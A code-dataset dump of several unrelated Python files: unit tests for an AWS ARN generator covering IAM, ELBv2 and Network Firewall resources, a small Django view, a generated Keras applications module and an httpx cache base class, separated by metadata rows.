class WhenGeneratingAnArnAndValidatingSchema(unittest.TestCase):
	"""Malformed resource type strings are rejected with an ApplicationError."""
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_with_invalid_resource_type(self):
		resource = build_resource({'Type': 'AWS::Instance'})
		with self.assertRaises(ApplicationError) as cm:
			self.arn_generator.try_generate_arn('AnyName', resource, 'Ref')
		self.assertEqual('Invalid resource type: AWS::Instance', str(cm.exception))
class WhenGeneratingAnArnForACloudFormationModule(unittest.TestCase):
	"""CloudFormation module types (…::MODULE) are explicitly unsupported."""
	@mock_node_evaluator_setup()
	def test_should_raise_error(self):
		arn_generator = ArnGenerator(account_config)
		resource = build_resource({'Type': 'Org::ServiceName::UseCase::MODULE'})
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('AnyName', resource, 'Ref')
		self.assertEqual('Unable to resolve Org::ServiceName::UseCase::MODULE. CloudFormation modules are not yet supported.', str(cm.exception))
class WhenGeneratingAnArnForAnIAMRoleAndValidatingSchema(unittest.TestCase):
	"""Schema validation errors when generating an AWS::IAM::Role ARN."""
	@mock_node_evaluator_setup()
	def test_with_no_properties(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::Role'
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('MyRole', template['Resources']['ResourceA'], 'Arn')
		self.assertEqual(required_property_error('Properties', 'ResourceA'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_path_type(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::Role',
				'Properties': {
					'Path': []
				}
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('MyRole', template['Resources']['ResourceA'], 'Arn')
		self.assertEqual(expected_type_error('ResourceA.Properties.Path', 'string', '[]'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_role_name_type(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::Role',
				'Properties': {
					'RoleName': []
				}
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('MyRole', template['Resources']['ResourceA'], 'Arn')
		self.assertEqual(expected_type_error('ResourceA.Properties.RoleName', 'string', '[]'), str(cm.exception))
class WhenGeneratingAnArnForAnIAMRole(unittest.TestCase):
	"""Path/RoleName resolution when generating AWS::IAM::Role ARNs."""
	@staticmethod
	def add_resource_to_template(resource):
		# NOTE(review): 'InvalidRoleReference' carries deliberately invalid
		# properties — presumably to show unreferenced resources are not
		# validated; confirm against ArnGenerator's behavior.
		template = load({
			'Parameters': {
				'MyRoleParameter': {'Type': 'string'},
				'MyPathParameter': {'Type': 'string'}
			},
			'Resources': {
				'InvalidRoleReference': {
					'Type': 'AWS::IAM::Role',
					'Properties': {
						'RoleName': {'NotA': 'String'},
						'Path': ['NotA', 'String']
					}
				},
				'ResourceA': resource
			}
		},
		{
			'MyRoleParameter': 'MyCustomRoleName',
			'MyPathParameter': '/my/custom/path/'
		})
		return template['Resources']['ResourceA']
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_path_and_name(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::Role',
			'Properties': {
				'Path': {'Ref': 'MyPathParameter'},
				'RoleName': {'Ref': 'MyRoleParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("MyRole", resource, "Arn")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:role/my/custom/path/MyCustomRoleName", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_path_and_resource_name_if_no_name(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::Role',
			'Properties': {
				'Path': {'Ref': 'MyPathParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("MyRole", resource, "Arn")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:role/my/custom/path/MyRole", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_default_path_and_name_if_no_path(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::Role',
			'Properties': {
				'RoleName': {'Ref': 'MyRoleParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("MyRole", resource, "Arn")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:role/MyCustomRoleName", arn)
class WhenGeneratingAnArnForAnIAMUserAndValidatingSchema(unittest.TestCase):
	"""Schema validation errors when generating an AWS::IAM::User ARN."""
	@mock_node_evaluator_setup()
	def test_with_invalid_path_type(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::User',
				'Properties': {
					'Path': []
				}
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('MyUser', template['Resources']['ResourceA'], 'Arn')
		self.assertEqual(expected_type_error('ResourceA.Properties.Path', 'string', '[]'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_user_name_type(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::User',
				'Properties': {
					'UserName': []
				}
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('MyUser', template['Resources']['ResourceA'], 'Arn')
		self.assertEqual(expected_type_error('ResourceA.Properties.UserName', 'string', '[]'), str(cm.exception))
class WhenGeneratingAnArnForAnIAMUser(unittest.TestCase):
	"""Path/UserName resolution when generating AWS::IAM::User ARNs.

	NOTE(review): a later class in this module re-uses this exact class name,
	which shadows this class at import time so these tests never run under
	unittest discovery — confirm and rename one of the two.
	"""
	@staticmethod
	def add_resource_to_template(resource):
		template = load({
			'Parameters': {
				'MyUserParameter': {'Type': 'string'},
				'MyPathParameter': {'Type': 'string'}
			},
			'Resources': {
				'ResourceA': resource
			}
		},
		{
			'MyUserParameter': 'MyCustomUserName',
			'MyPathParameter': '/my/custom/user/path/'
		})
		return template['Resources']['ResourceA']
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_path_and_name(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::User',
			'Properties': {
				'Path': {'Ref': 'MyPathParameter'},
				'UserName': {'Ref': 'MyUserParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/my/custom/user/path/MyCustomUserName", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_path_and_resource_name_if_no_name(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::User',
			'Properties': {
				'Path': {'Ref': 'MyPathParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/my/custom/user/path/MyUser", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_default_path_and_name_if_no_path(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::User',
			'Properties': {
				'UserName': {'Ref': 'MyUserParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/MyCustomUserName", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_all_defaults_if_no_properties(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::User'
		})
		arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/MyUser", arn)
class WhenGeneratingAnArnForAnIAMManagedPolicyAndValidatingSchema(unittest.TestCase):
	"""Schema validation errors when generating an AWS::IAM::ManagedPolicy ARN."""
	@mock_node_evaluator_setup()
	def test_with_no_properties(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::ManagedPolicy'
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('MyPolicy', template['Resources']['ResourceA'], 'Ref')
		self.assertEqual(required_property_error('Properties', 'ResourceA'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_path_type(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::ManagedPolicy',
				'Properties': {
					'Path': []
				}
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('ResourceA', template['Resources']['ResourceA'], 'Ref')
		self.assertEqual(expected_type_error('ResourceA.Properties.Path', 'string', '[]'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_managed_policy_name_type(self):
		template = load_resources({
			'ResourceA': {
				'Type': 'AWS::IAM::ManagedPolicy',
				'Properties': {
					'ManagedPolicyName': []
				}
			}
		})
		arn_generator = ArnGenerator(account_config)
		with self.assertRaises(ApplicationError) as cm:
			arn_generator.try_generate_arn('ResourceA', template['Resources']['ResourceA'], 'Ref')
		self.assertEqual(expected_type_error('ResourceA.Properties.ManagedPolicyName', 'string', '[]'), str(cm.exception))
class WhenGeneratingAnArnForAnIAMManagedPolicy(unittest.TestCase):
	"""Path/ManagedPolicyName resolution for AWS::IAM::ManagedPolicy ARNs.

	Bug fix: this class was previously named WhenGeneratingAnArnForAnIAMUser,
	colliding with the earlier IAM user test class. The duplicate definition
	shadowed the first class at import time, so the IAM user tests never ran
	under unittest discovery. The new name matches the resources tested here.
	"""
	@staticmethod
	def add_resource_to_template(resource):
		# Embed *resource* as 'ResourceA' alongside policy-name/path parameters.
		template = load({
			'Parameters': {
				'MyManagedPolicyParameter': {'Type': 'string'},
				'MyPathParameter': {'Type': 'string'}
			},
			'Resources': {
				'ResourceA': resource
			}
		},
		{
			'MyManagedPolicyParameter': 'MyCustomManagedPolicyName',
			'MyPathParameter': '/my/custom/policy/path/'
		})
		return template['Resources']['ResourceA']
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_path_and_name(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::ManagedPolicy',
			'Properties': {
				'Path': {'Ref': 'MyPathParameter'},
				'ManagedPolicyName': {'Ref': 'MyManagedPolicyParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("MyPolicy", resource, "Ref")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:policy/my/custom/policy/path/MyCustomManagedPolicyName", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_path_and_resource_name_if_no_name(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::ManagedPolicy',
			'Properties': {
				'Path': {'Ref': 'MyPathParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("ResourceA", resource, "Ref")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:policy/my/custom/policy/path/ResourceA", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_with_default_path_and_name_if_no_path(self):
		resource = self.add_resource_to_template({
			'Type': 'AWS::IAM::ManagedPolicy',
			'Properties': {
				'ManagedPolicyName': {'Ref': 'MyManagedPolicyParameter'}
			}
		})
		arn = self.arn_generator.try_generate_arn("ResourceA", resource, "Ref")
		self.assertEqual(f"arn:aws:iam::{account_config.account_id}:policy/MyCustomManagedPolicyName", arn)
class WhenGeneratingAnArnForELBv2ResourcesAndValidatingSchema(unittest.TestCase):
	"""Schema validation for ELBv2 Type/Protocol properties used in ARN generation."""
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_with_invalid_load_balancer_type_type(self):
		resource = build_resource({
			'Type': 'AWS::ElasticLoadBalancingV2::LoadBalancer',
			'Properties': {
				'Type': []
			}
		})
		with self.assertRaises(ApplicationError) as cm:
			self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
		self.assertEqual(expected_type_error('ResourceA.Properties.Type', 'string', '[]'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_load_balancer_listener_protocol_type(self):
		resource = build_resource({
			'Type': 'AWS::ElasticLoadBalancingV2::Listener',
			'Properties': {
				'Protocol': []
			}
		})
		with self.assertRaises(ApplicationError) as cm:
			self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
		self.assertEqual(expected_type_error('ResourceA.Properties.Protocol', 'string', '[]'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_load_balancer_target_group_protocol_type(self):
		resource = build_resource({
			'Type': 'AWS::ElasticLoadBalancingV2::TargetGroup',
			'Properties': {
				'Protocol': []
			}
		})
		with self.assertRaises(ApplicationError) as cm:
			self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
		self.assertEqual(expected_type_error('ResourceA.Properties.Protocol', 'string', '[]'), str(cm.exception))
# ELBv2 resources have a specific generation pattern that depends on if the ELB is an ALB or an NLB
class WhenGeneratingAnArnForELBv2Resources(unittest.TestCase):
	"""ARN generation for ELBv2 load balancers, listeners, and target groups."""
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_does_not_generate_arn_for_alb_attributes(self):
		resource = build_resource({'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer"})
		arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Arn")
		self.assertIsNone(arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_implicit_alb(self):
		# No 'Type' property: the generator treats the LB as an ALB ("app").
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer"
		})
		arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Ref")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlb/MyAlb", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_explicit_alb(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer",
			'Properties': {
				'Type': 'application'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Ref")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlb/MyAlb", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_nlb(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer",
			'Properties': {
				'Type': 'network'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyNlb", resource, "Ref")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/net/MyNlb/MyNlb", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_gwy_lb(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer",
			'Properties': {
				'Type': 'gateway'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyGwlb", resource, "Ref")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/gwy/MyGwlb/MyGwlb", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_alb_listener(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::Listener",
			'Properties': {
				'Protocol': 'HTTPS'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Ref")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:listener/app/MyAlb/MyAlb/MyAlb", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_nlb_listener(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::Listener",
			'Properties': {
				'Protocol': 'TCP'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyNlb", resource, "Ref")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:listener/net/MyNlb/MyNlb/MyNlb", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_gwy_listener(self):
		resource = build_resource({
			'Type': 'AWS::ElasticLoadBalancingV2::Listener',
			'Properties': {}
		})
		arn = self.arn_generator.try_generate_arn("MyGwlb", resource, "Ref")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:listener/gwy/MyGwlb/MyGwlb/MyGwlb", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_alb_target_group_with_no_protocol(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
			'Properties': {}
		})
		arn = self.arn_generator.try_generate_arn("MyAlbTargetGroup", resource, "LoadBalancerArns")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlbTargetGroup/MyAlbTargetGroup", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_alb_target_group(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
			'Properties': {
				'Protocol': 'HTTPS'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyAlbTargetGroup", resource, "LoadBalancerArns")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlbTargetGroup/MyAlbTargetGroup", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_nlb_target_group(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
			'Properties': {
				'Protocol': 'TCP'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyNlbTargetGroup", resource, "LoadBalancerArns")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/net/MyNlbTargetGroup/MyNlbTargetGroup", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_gwy_target_group(self):
		resource = build_resource({
			'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
			'Properties': {
				'Protocol': 'GENEVE'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyGwyTargetGroup", resource, "LoadBalancerArns")
		self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/gwy/MyGwyTargetGroup/MyGwyTargetGroup", arn)
class WhenGeneratingAnArnForNetworkFirewallRuleGroupsAndValidatingSchema(unittest.TestCase):
	"""Schema validation for the NetworkFirewall RuleGroup 'Type' property."""
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_with_no_rulegroup_type(self):
		resource = build_resource({
			'Type': 'AWS::NetworkFirewall::RuleGroup',
			'Properties': {}
		})
		with self.assertRaises(ApplicationError) as cm:
			self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
		self.assertEqual(required_property_error('Type', 'ResourceA.Properties'), str(cm.exception))
	@mock_node_evaluator_setup()
	def test_with_invalid_rulegroup_type(self):
		resource = build_resource({
			'Type': 'AWS::NetworkFirewall::RuleGroup',
			'Properties': {
				'Type': []
			}
		})
		with self.assertRaises(ApplicationError) as cm:
			self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
		self.assertEqual(expected_type_error('ResourceA.Properties.Type', 'string', '[]'), str(cm.exception))
# Network Firewall Rulegroup resources have a specific pattern that depends on if the NFW rule is stateful or stateless
class WhenGeneratingAnArnForNetworkFirewallRuleGroups(unittest.TestCase):
	"""ARN generation for AWS::NetworkFirewall::RuleGroup (stateful vs stateless)."""
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_does_not_generate_arn_for_attributes(self):
		# Renamed from test_does_not_generate_arn_for_alb_attributes: the old
		# name was a copy/paste leftover from the ELBv2 tests — this class
		# exercises NetworkFirewall rule groups, not ALBs.
		resource = build_resource({'Type': "AWS::NetworkFirewall::RuleGroup"})
		arn = self.arn_generator.try_generate_arn("MyNFW", resource, "Arn")
		self.assertIsNone(arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_stateful_rulegroup(self):
		resource = build_resource({
			'Type': "AWS::NetworkFirewall::RuleGroup",
			'Properties': {
				'Type': 'STATEFUL'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyNfw", resource, "Ref")
		self.assertEqual(f"arn:aws:network-firewall:{account_config.region}:{account_config.account_id}:stateful-rulegroup/MyNfw", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_for_stateless_rulegroup(self):
		resource = build_resource({
			'Type': "AWS::NetworkFirewall::RuleGroup",
			'Properties': {
				'Type': 'STATELESS'
			}
		})
		arn = self.arn_generator.try_generate_arn("MyNfw", resource, "Ref")
		self.assertEqual(f"arn:aws:network-firewall:{account_config.region}:{account_config.account_id}:stateless-rulegroup/MyNfw", arn)
| 39.66563
| 165
| 0.641012
| 2,521
| 25,505
| 6.194367
| 0.077747
| 0.048412
| 0.046107
| 0.061988
| 0.849321
| 0.844262
| 0.821081
| 0.802766
| 0.790151
| 0.775551
| 0
| 0.001027
| 0.236581
| 25,505
| 642
| 166
| 39.727414
| 0.800986
| 0.012311
| 0
| 0.67433
| 0
| 0.032567
| 0.256771
| 0.152053
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.109195
| false
| 0
| 0.009579
| 0
| 0.153257
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c04565f9c6906e3c515e7bbdd58c77236aa3840f
| 24
|
py
|
Python
|
skynet/home/__init__.py
|
brianjyee/skynet
|
924f9d153bf436a99aa7199fa3949f425d7ce05d
|
[
"BSD-2-Clause"
] | 6
|
2017-03-17T14:15:58.000Z
|
2018-05-31T04:27:12.000Z
|
skynet/home/__init__.py
|
brianjyee/skynet
|
924f9d153bf436a99aa7199fa3949f425d7ce05d
|
[
"BSD-2-Clause"
] | null | null | null |
skynet/home/__init__.py
|
brianjyee/skynet
|
924f9d153bf436a99aa7199fa3949f425d7ce05d
|
[
"BSD-2-Clause"
] | 4
|
2017-03-22T23:42:22.000Z
|
2018-09-29T23:47:33.000Z
|
from .views import home
| 12
| 23
| 0.791667
| 4
| 24
| 4.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c04a377ca404dbec86f1ae651798bc0c1ef18297
| 102
|
py
|
Python
|
ask/blog/views.py
|
ztp99/pywebstepic
|
59ffd969cb8dc0d602941d6676757cc4e9f7858b
|
[
"Apache-2.0"
] | null | null | null |
ask/blog/views.py
|
ztp99/pywebstepic
|
59ffd969cb8dc0d602941d6676757cc4e9f7858b
|
[
"Apache-2.0"
] | null | null | null |
ask/blog/views.py
|
ztp99/pywebstepic
|
59ffd969cb8dc0d602941d6676757cc4e9f7858b
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# blog
def home(request):
    """Return a plain 'Hello World' response for the blog home page.

    Bug fix: HttpResponse was used but never imported (the module only
    imports `render` from django.shortcuts), so every request raised
    NameError. Imported locally to keep the module's import block intact.
    """
    from django.http import HttpResponse
    return HttpResponse('Hello World')
| 17
| 38
| 0.754902
| 13
| 102
| 5.923077
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 102
| 5
| 39
| 20.4
| 0.895349
| 0.039216
| 0
| 0
| 0
| 0
| 0.114583
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c05b53fc9b1738070bd9ea6516b9ff428c008ed2
| 2,020
|
py
|
Python
|
venv/Lib/site-packages/tensorflow_core/python/keras/api/keras/applications/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/python/keras/api/keras/applications/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/python/keras/api/keras/applications/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Keras Applications are canned architectures with pre-trained weights.
"""
from __future__ import print_function as _print_function
import sys as _sys
from . import densenet
from . import imagenet_utils
from . import inception_resnet_v2
from . import inception_v3
from . import mobilenet
from . import mobilenet_v2
from . import nasnet
from . import resnet
from . import resnet50
from . import resnet_v2
from . import vgg16
from . import vgg19
from . import xception
from tensorflow.python.keras.applications import DenseNet121
from tensorflow.python.keras.applications import DenseNet169
from tensorflow.python.keras.applications import DenseNet201
from tensorflow.python.keras.applications import InceptionResNetV2
from tensorflow.python.keras.applications import InceptionV3
from tensorflow.python.keras.applications import MobileNet
from tensorflow.python.keras.applications import MobileNetV2
from tensorflow.python.keras.applications import NASNetLarge
from tensorflow.python.keras.applications import NASNetMobile
from tensorflow.python.keras.applications import ResNet101
from tensorflow.python.keras.applications import ResNet101V2
from tensorflow.python.keras.applications import ResNet152
from tensorflow.python.keras.applications import ResNet152V2
from tensorflow.python.keras.applications import ResNet50
from tensorflow.python.keras.applications import ResNet50V2
from tensorflow.python.keras.applications import VGG16
from tensorflow.python.keras.applications import VGG19
from tensorflow.python.keras.applications import Xception
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
_sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
_sys.modules[__name__], "keras.applications", public_apis=None, deprecation=True,
has_lite=False)
| 40.4
| 87
| 0.844554
| 253
| 2,020
| 6.577075
| 0.300395
| 0.192308
| 0.228365
| 0.270433
| 0.524038
| 0.524038
| 0.058894
| 0.058894
| 0.058894
| 0
| 0
| 0.024685
| 0.097525
| 2,020
| 49
| 88
| 41.22449
| 0.888097
| 0.09703
| 0
| 0
| 1
| 0
| 0.009912
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.871795
| 0
| 0.871795
| 0.051282
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fbfb64a992942b1da297cf671017568072aecfd6
| 2,501
|
py
|
Python
|
httpx_cache/cache/base.py
|
obendidi/httpx-cache
|
897dd8da5bb377ed7f61b367716976bdc0d581b1
|
[
"BSD-3-Clause"
] | 16
|
2021-12-13T01:27:44.000Z
|
2022-02-28T02:58:46.000Z
|
httpx_cache/cache/base.py
|
obendidi/httpx-cache
|
897dd8da5bb377ed7f61b367716976bdc0d581b1
|
[
"BSD-3-Clause"
] | 23
|
2022-01-03T15:57:39.000Z
|
2022-03-28T22:25:08.000Z
|
httpx_cache/cache/base.py
|
obendidi/httpx-cache
|
897dd8da5bb377ed7f61b367716976bdc0d581b1
|
[
"BSD-3-Clause"
] | 2
|
2022-01-21T17:57:19.000Z
|
2022-01-21T18:18:47.000Z
|
import typing as tp
from abc import ABC, abstractmethod
import httpx
class BaseCache(ABC):
@abstractmethod
def get(self, request: httpx.Request) -> tp.Optional[httpx.Response]:
"""Get cached response from Cache.
We use the httpx.Request.url as key.
Args:
request: httpx.Request
Returns:
tp.Optional[httpx.Response]
"""
@abstractmethod
async def aget(self, request: httpx.Request) -> tp.Optional[httpx.Response]:
"""(Async) Get cached response from Cache.
We use the httpx.Request.url as key.
Args:
request: httpx.Request
Returns:
tp.Optional[httpx.Response]
"""
@abstractmethod
def set(
self,
*,
request: httpx.Request,
response: httpx.Response,
content: tp.Optional[bytes] = None
) -> None:
"""Set new response entry in cache.
In case the response does not yet have a '_content' property, content should
be provided in the optional 'content' kwarg (usually using a callback)
Args:
request: httpx.Request
response: httpx.Response, to cache
content (bytes, optional): Defaults to None, should be provided in case
response that not have yet content.
"""
@abstractmethod
async def aset(
self,
*,
request: httpx.Request,
response: httpx.Response,
content: tp.Optional[bytes] = None
) -> None:
"""(Async) Set new response entry in cache.
In case the response does not yet have a '_content' property, content should
be provided in the optional 'content' kwarg (usually using a callback)
Args:
request: httpx.Request
response: httpx.Response, to cache
content (bytes, optional): Defaults to None, should be provided in case
response that not have yet content.
"""
@abstractmethod
def delete(self, request: httpx.Request) -> None:
"""Delete an entry from cache.
Args:
request: httpx.Request
"""
@abstractmethod
